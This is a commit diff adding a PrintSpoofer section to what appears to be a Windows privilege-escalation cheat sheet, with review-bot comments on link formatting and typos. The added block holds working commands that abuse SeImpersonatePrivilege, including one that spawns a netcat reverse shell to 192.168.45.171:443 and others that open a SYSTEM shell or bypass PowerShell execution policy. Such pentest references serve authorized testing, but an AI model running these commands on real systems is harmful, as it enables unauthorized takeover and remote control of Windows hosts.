add priv esc windows

enaylal 2023-11-16 23:37:12 +01:00
parent d93a228b40
commit 4684fed4aa


@ -49,6 +49,7 @@
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
* [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug)))
* [EoP - Privileged File Write](#eop---privileged-file-write)
* [DiagHub](#diaghub)
* [UsoDLLLoader](#usodllloader)
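Review bot: The new PrintSpoofer table-of-contents entry has a malformed link target: it ends in three closing parentheses and uses a mixed-case anchor (`#PrintSpoofer-Printer-Bug`), while the other entries in this list use lowercase anchors. Suggest `* [PrintSpoofer (Printer Bug)](#printspoofer-printer-bug)` so the link resolves to the new heading. The Rogue Potato and EFSPotato context lines just above carry the same stray extra `)` and could be cleaned up in the same change.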
@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
```
### PrintSpoofer (Printer Bug)
> this work if SeImpersonatePrivilege is enabled
* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
```powershell
# run nc -lnvp 443 then :
.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
# without listener
.\PrintSpoofer64.exe -i -c cmd
# Via RPD
.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
```
## EoP - Privileged File Write
### DiagHub
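Review bot: In the new PowerShell block the comment `# Via RPD` is a typo for RDP, and the options used (`-i`, `-d 3`, `-c`) are undocumented, so a reader cannot tell what the `3` refers to or why the second and third commands differ; a short comment on each line would fix that. The first command also hard-codes a lab address and path (`192.168.45.171`, `C:\Temp\nc64.exe`); placeholders such as `<LHOST>` and `<LPORT>` would match how a cheat sheet is normally used. The precondition line should read "this works if SeImpersonatePrivilege is enabled", and it would help to state how to confirm that privilege before running the tool, since the section depends on it.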